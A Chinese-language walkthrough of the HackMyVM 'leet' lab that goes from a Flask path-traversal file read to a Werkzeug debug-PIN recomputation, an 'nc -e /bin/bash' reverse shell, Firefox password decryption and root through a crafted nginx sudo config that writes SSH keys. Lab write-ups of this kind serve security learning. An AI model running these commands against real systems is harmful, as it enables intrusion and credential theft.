信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.144  08:00:27:3d:ab:f1       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ed:2f:2b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.061 seconds (124.21 hosts/sec). 4 responded
❯ export ip=192.168.60.144
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.144:22
Open 192.168.60.144:7777
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 14:16 CST
Initiating ARP Ping Scan at 14:16
Scanning 192.168.60.144 [1 port]
Completed ARP Ping Scan at 14:16, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:16
Completed Parallel DNS resolution of 1 host. at 14:16, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:16
Scanning 192.168.60.144 [2 ports]
Discovered open port 7777/tcp on 192.168.60.144
Discovered open port 22/tcp on 192.168.60.144
Completed SYN Stealth Scan at 14:16, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.144
Host is up, received arp-response (0.00057s latency).
Scanned at 2025-04-21 14:16:35 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
7777/tcp open  cbt     syn-ack ttl 64
MAC Address: 08:00:27:3D:AB:F1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

只有7777端口开放

尝试枚举目录

❯ gobuster dir -u http://$ip:7777 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.144:7777
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/download             (Status: 500) [Size: 14478]

扫的很慢，浏览器访问一下/download

LFI 文件包含

发现报错了，不过从报错信息可以得知使由Flask框架服务的

而且错误参数是为提供filename的参数导致的

不过你访问[L33T Convertor](http://192.168.60.144:7777/)

发现提供的是字符转换的功能

点击download file text会跳转至download

关于字符转换详细可以参考HackMyVM-p4l4nc4-Walkthrough | Pepster’Blog

但这不是重点，你可以发现传参filename如下

download?filename=converted_text.txt

那么可以尝试进行LFI文件读取

❯ curl 'http://192.168.60.144:7777/download?filename=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
riva:x:1000:1000:,,,:/home/riva:/bin/bash

得到用户riva

尝试读取其他敏感文件

发现靶机存在域名leet.hmv

❯ curl 'http://192.168.60.144:7777/download?filename=../../../../etc/hosts'
127.0.0.1       localhost
127.0.1.1       leet.hmv

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

修改一下hosts文件，添加域名

1
2
3

❯ echo "$ip leet.hmv"|sudo tee /etc/hosts
[sudo] password for Pepster:
192.168.60.144 leet.hmv

我尝试直接读取用户的私钥文件，但根据报错信息来看，好像是没有权限

同时报错信息中暴露了很多信息，我们可以读取/opt/project/app.py此项目文件

查看源代码

from flask import Flask, request, send_file, abort, render_template_string
from werkzeug.exceptions import BadRequest
import os

app = Flask(__name__)
app.config['DEBUG'] = True

@app.route('/', methods=['GET', 'POST'])
def leet_converter():
    if request.method == 'POST':
        text = request.form['text']
        leet_text = text.translate(str.maketrans("aeios", "43105"))
        output_filename = "/tmp/converted_text.txt"
        with open(output_filename, "w") as f:
            f.write(leet_text)
        return render_template_string('''
            <!DOCTYPE html>
            <html>
            <head>
                <title>L33T Convertor</title>
                <style>
                    body { background-color: #333; color: #ddd; font-family: "Courier New", Courier, monospace; margin: 0; padding: 20px; }
                    .container { max-width: 600px; margin: auto; padding: 20px; background-color: #444; border-radius: 8px; }
                    h2 {
                    color: #eee;
                    text-align: center;
                    }

                    a, a:visited { color: #dcdcdc; text-decoration: underline; }
                    a:hover { color: #ffffff; }
                    form { display: flex; flex-direction: column; }
                    input[type="text"], input[type="submit"] { padding: 10px; margin-top: 10px; border-radius: 4px; border: 1px solid #555; background: #555; color: #ddd; }
                    input[type="submit"] { cursor: pointer; }
                    input[type="submit"]:hover { background: #666; }
                </style>
            </head>
            <body>
                <div class="container">
                    <h2>L33T converter</h2>
                    <form method="post">
                        <input type="text" name="text" placeholder="Type your text here">
                        <input type="submit" value="Convert to L33T">
                    </form>
                    {% if leet_text %}
                        <p>Résultat : {{ leet_text }}</p>
                        <a href="/download?filename=converted_text.txt">Download file text</a>
                    {% endif %}
                </div>
            </body>
            </html>
        ''', leet_text=leet_text)
    else:
        return render_template_string('''
            <!DOCTYPE html>
            <html>
            <head>
                <style>
                    body { background-color: #333; color: #ddd; font-family: "Courier New", Courier, monospace; margin: 0; padding: 20px; }
                    .container { max-width: 600px; margin: auto; padding: 20px; background-color: #444; border-radius: 8px; }
                    h2 { color: #eee; }
                    form { display: flex; flex-direction: column; }
                    input[type="text"], input[type="submit"] { padding: 10px; margin-top: 10px; border-radius: 4px; border: 1px solid #555; background: #555; color: #ddd; }
                    input[type="submit"] { cursor: pointer; }
                    input[type="submit"]:hover { background: #666; }
                </style>
            </head>
            <body>
                <div class="container">
                    <center><h2>L33T Converter</h2></center>
                    <form method="post">
                        <input type="text" name="text" placeholder="Type your text here">
                        <input type="submit" value="Convert to L33T">
                    </form>
                </div>
            </body>
            </html>
        ''')

@app.route('/download')
def download_file():
    filename = request.args.get('filename')

    if not filename or filename.startswith("/"):
        raise ValueError("Parameter 'filename' invalid or missing.")

    filepath = os.path.join("/tmp", filename)

    try:
        return send_file(filepath, as_attachment=True)
    except Exception as e:
        raise e

if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')

Flask Werkzeug Debugger

我们可以从中得知debug=True，开启了调试功能

在 Flask 的 Debug 模式中，/console 是调试器（Werkzeug Debugger）提供的一个交互式 Python 控制台，允许你在浏览器中直接执行代码。

你可以直接访问/console

有个弹窗需要输入pin码后，才能执行代码

具体方案可以参考Werkzeug / Flask Debug - HackTricks

由于PIN 码的生成逻辑是公开的，但依赖本地系统信息

又因为我们可以进行文件读取，所以可以尝试推算出pin码

wdahlenburg/werkzeug-debug-console-bypass：Werkzeug 有一个需要 pin 的调试控制台。可以使用 LFI 漏洞绕过此问题，或将其用作本地权限提升向量。

git上述项目，我们修改一下代码中的probably_public_bits private_bits列表

根据项目说明，首先我们需要获取网卡的MAC地址，再转为十进制

❯ curl -s 'http://leet.hmv:7777/download?filename=../../../../../../sys/class/net/enp0s3/address'
08:00:27:3d:ab:f1
❯ python3 -c "print(int('08:00:27:3d:ab:f1'.replace(':',''),16))"
8796751375345

尝试读取机器码

1 2	❯ curl 'http://leet.hmv:7777/download?filename=../../../../../../etc/machine-id' f6791f240ce6407ea271e86b78ac3bdb

在这里我尝试利用curl读取/proc/self/cgroup，没回显⁉️很奇怪

但是我用yakit就能读出来

再次读取/proc/sys/kernel/random/boot_id

得到内容后分别写入文件

❯ echo "f6791f240ce6407ea271e86b78ac3bdb"|tee machine-id
f6791f240ce6407ea271e86b78ac3bdb
❯ echo "01be5bde-4c7e-451a-89c3-0e57c1f28e46"|tee boot_id
01be5bde-4c7e-451a-89c3-0e57c1f28e46
❯ echo "0::/system.slice/flaskapp.service"|tee cgroup
0::/system.slice/flaskapp.service

根据项目中的第十步，利用以下脚本生成机器ID

machine_id = b""
for filename in "machine-id", "boot_id":
    try:
        with open(filename, "rb") as f:
            value = f.readline().strip()
    except OSError:
        continue

    if value:
        machine_id += value
        break
try:
    with open("cgroup", "rb") as f:
        machine_id += f.readline().strip().rpartition(b"/")[2]
except OSError:
    pass

print(machine_id)

尝试运行

1 2	❯ python3 exp.py b'f6791f240ce6407ea271e86b78ac3bdbflaskapp.service'

最后修改脚本的部分内容如下

probably_public_bits = [
        'www-data',# username
        'flask.app',# modname
        'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
        '/opt/project/venv/lib/python3.11/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
        '8796751375345',# str(uuid.getnode()),  /sys/class/net/ens33/address
        # Machine Id: /etc/machine-id + /proc/sys/kernel/random/boot_id + /proc/self/cgroup
        'f6791f240ce6407ea271e86b78ac3bdbflaskapp.service'
]

在这我的pin码死活不对，我甚至重装了好几次靶机

我也参考了其他大佬的WP，发现其余都是不变的，变化的只有网卡的MAC地址

换了个环境，在此环境下VirtualBox版本为6.0.14，导入靶机时默认设置

生成的pin码即可验证通过

1
2
3

❯ ./werkzeug-pin-bypass.py
[*] 正在生成调试 PIN...
生成的 PIN 码为: 878-038-654

用户提权

尝试执行命令__import__('os').popen('nc -e /bin/bash 192.168.56.102 4444').read();

反弹shell，监听端口

得知www-data拥有sudo权限可以以riva用户身份执行/usr/bin/micro

www-data@leet:/opt/project$ sudo -l
Matching Defaults entries for www-data on leet:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on leet:
    (riva) NOPASSWD: /usr/bin/micro

发现micro是个文本编辑器，查询一下常见用法，我随便尝试一个快捷键Ctrl+B再输入bash即可

这样就拿到user flag了

www-data@leet:/opt/project$ sudo -u riva /usr/bin/micro 

Press enter to continue
riva@leet:/opt/project$ cd ~
riva@leet:~$ cat user.txt 
3a5cf7b35876169c280229c213ed63c1

FireFox 凭证转储

再次信息收集，在用户家目录下发现存在.mozilla文件夹

参考FireFox Credentials Dumping | Exploit Notes

利用脚本解密FireFox凭证信息

上传firefox_decrypt.py到靶机上执行

得到riva用用户的密码PGH$2r0co3L5QL

┌──(kali㉿kali)-[~]
└─$ git clone https://git.pepster.me/unode/firefox_decrypt.git
Cloning into 'firefox_decrypt'...
remote: Enumerating objects: 1382, done.
remote: Counting objects: 100% (292/292), done.
remote: Compressing objects: 100% (38/38), done.
remote: Total 1382 (delta 273), reused 254 (delta 254), pack-reused 1090 (from 2)
Receiving objects: 100% (1382/1382), 482.80 KiB | 848.00 KiB/s, done.
Resolving deltas: 100% (870/870), done.
┌──(kali㉿kali)-[~]
└─$ cd firefox_decrypt 
┌──(kali㉿kali)-[~/firefox_decrypt]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.101 - - [23/Apr/2025 04:00:51] "GET /firefox_decrypt.py HTTP/1.1" 200 -
----------------------------------------
#靶机中执行
riva@leet:~$ wget 192.168.56.102:8000/firefox_decrypt.py
--2025-04-23 10:00:49--  http://192.168.56.102:8000/firefox_decrypt.py
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39405 (38K) [text/x-python]
Saving to: ‘firefox_decrypt.py’

firefox_decrypt.py  100%[===================>]  38.48K  --.-KB/s    in 0s      

2025-04-23 10:00:49 (462 MB/s) - ‘firefox_decrypt.py’ saved [39405/39405]
riva@leet:~$ python3 firefox_decrypt.py |grep riva -A 5
Select the Mozilla profile you wish to decrypt
1 -> zbznfk37.default
2 -> guu30cui.default-esr
2
Username: 'riva'
Password: 'PGH$2r0co3L5QL'

Website:   https://hackmyvm.eu
Username: 'riva'
Password: 'lovelove80'

Root提权

在riva用户下同样也拥有sudo权限

可以运行nginx程序

riva@leet:~$ sudo -l
[sudo] password for riva: 
Matching Defaults entries for riva on leet:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User riva may run the following commands on leet:
    (root) /usr/sbin/nginx

nginx利用其参数-c在运行前可以指定配置文件

riva@leet:~$ /usr/sbin/nginx -h
nginx version: nginx/1.22.1
Usage: nginx [-?hvVtTq] [-s signal] [-p prefix]
             [-e filename] [-c filename] [-g directives]

Options:
  -?,-h         : this help
  -v            : show version and exit
  -V            : show version and configure options then exit
  -t            : test configuration and exit
  -T            : test configuration, dump it and exit
  -q            : suppress non-error messages during configuration testing
  -s signal     : send signal to a master process: stop, quit, reopen, reload
  -p prefix     : set prefix path (default: /usr/share/nginx/)
  -e filename   : set error log file (default: stderr)
  -c filename   : set configuration file (default: /etc/nginx/nginx.conf)
  -g directives : set global directives out of configuration file

通过参考利用方案nginx_sudo_privesc/exploit.sh at main · DylanGrl/nginx_sudo_privesc

编辑一个配置文件，具体配置以root身份运行nginx

并且启用了PUT方法即用户可以随意上传文件到根目录下

尝试运行一下，可以看到80端口开放了

riva@leet:~$ cat <<EOF >a.conf
> user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 80;
                root /;
                autoindex on;
                dav_methods PUT;
        }
}
> EOF
riva@leet:~$ sudo /usr/sbin/nginx -c /home/riva/a.conf
riva@leet:~$ ss -luntp
Netid         State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process
udp           UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*
tcp           LISTEN          0               128                            0.0.0.0:7777                        0.0.0.0:*
tcp           LISTEN          0               511                            0.0.0.0:80                          0.0.0.0:*
tcp           LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*
tcp           LISTEN          0               128                               [::]:22                             [::]:*

不过这里有个小彩蛋，当你直接访问http://$ip/root会显示一张图片，哈哈哈🤣

访问目录时并不会显示文件列表，猜测可能/root目录中存在html文件，默认访问了

尝试上传公钥文件内容到/root/.ssh/authorized_keys中

root flag文件名修改了，就是不让你访问到，哈哈哈🤣

❯ curl -X PUT http://192.168.60.152/root/.ssh/authorized_keys -d "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCmhumzHA2kpAF9W/XS9FK1CjvRlb1iP5kC8RhE/oyVaePE+eZudjlyvGyuJb1GDTad9Zi0hIW14bqdvfgU7HIYJKV1Y/goqs6BddT7KkYEs5643MxxErViGZP52hF3zggAi7Ho/BlnjRMPev1c1ZGzPbR+dpxd3mB6LUkiSEGwbXNOdmmleqmcZAkVEh7vi90/m1S9btqQpbbVRICGBQY6IHyl/PY6jX/W/38u/hhzj0u4poqqubOIWF2RA231osvqrG151Yeg3RYMJW89pK8D6f+Ma1h7sLE3VLlYe5kA2O0aKz0dgLK5KOshI08XhzpwBLKkpYlMRJ4U0KqJ04jhaF1P7o4Wa+hViAdKxOTBL5Y8RoFEGKVmhT9/pAel7BAmuBU0keGS3JaA5OltDBfbSHPPskdrUg/gWhbsjtt7Z+tTzTOSgl1gpQzHnTnfaMosF3WkwQrYq2sjcNEEmtRCF4Gyn92vD1MWfhepC0lGW3Z3o7AGt38ZuiH6/cR9LsjjIDqG90C2yxH4yNEbgW9/0qf6iD+ghDz9mBtzk0dJHMU6/GoxXTY1e+/bAlqDCF2NR+fogTm7DeGNJ9CuaxXF+laYa1wSeIKdMbdi+fmfwqVbiDxxmqbtqJVGmsbmoB1UYP+XZ74LcOPbsPoNzWo53P87a3U2620bIQx32yFPXw== Pepster@primary"
❯ ssh root@$ip -i ../.ssh/id_rsa
The authenticity of host '192.168.60.152 (192.168.60.152)' can't be established.
ED25519 key fingerprint is SHA256:V0kY0pxHYgYYJeQXQGSoUclaPX71KqkFTnqjTNaj/Qk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.152' (ED25519) to the list of known hosts.
Linux leet.hmv 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 28 17:37:49 2024 from 192.168.0.178
root@leet:~# id
uid=0(root) gid=0(root) groups=0(root)
root@leet:~# ls -al
total 104
drwx------  7 root root  4096 May 28  2024 .
drwxr-xr-x 19 root root  4096 May 28  2024 ..
lrwxrwxrwx  1 root root     9 Feb  6  2024 .bash_history -> /dev/null
-rw-r--r--  1 root root   571 Feb 14  2024 .bashrc
drwxr-xr-x  4 root root  4096 Feb 14  2024 .cache
drwxr-xr-x  3 root root  4096 Feb 14  2024 .config
-rw-r--r--  1 root root   304 Feb 14  2024 index.html
-rw-------  1 root root    43 May 28  2024 .lesshst
drwxr-xr-x  3 root root  4096 Feb 14  2024 .local
drwx------  4 root root  4096 Feb 14  2024 .mozilla
-rw-r--r--  1 root root   161 Feb 14  2024 .profile
-rwx------  1 root root    33 Feb 14  2024 r007_fl46.7x7
drwx------  2 root root  4096 Apr 23 11:08 .ssh
-rw-r--r--  1 root root 47428 Feb 14  2024 troll.jpg
-rw-r--r--  1 root root   166 Feb 14  2024 .wget-hsts
-rw-------  1 root root    52 Feb 14  2024 .Xauthority
root@leet:~# cat r007_fl46.7x7
ca169772acb099a02ebab8da1d9070ea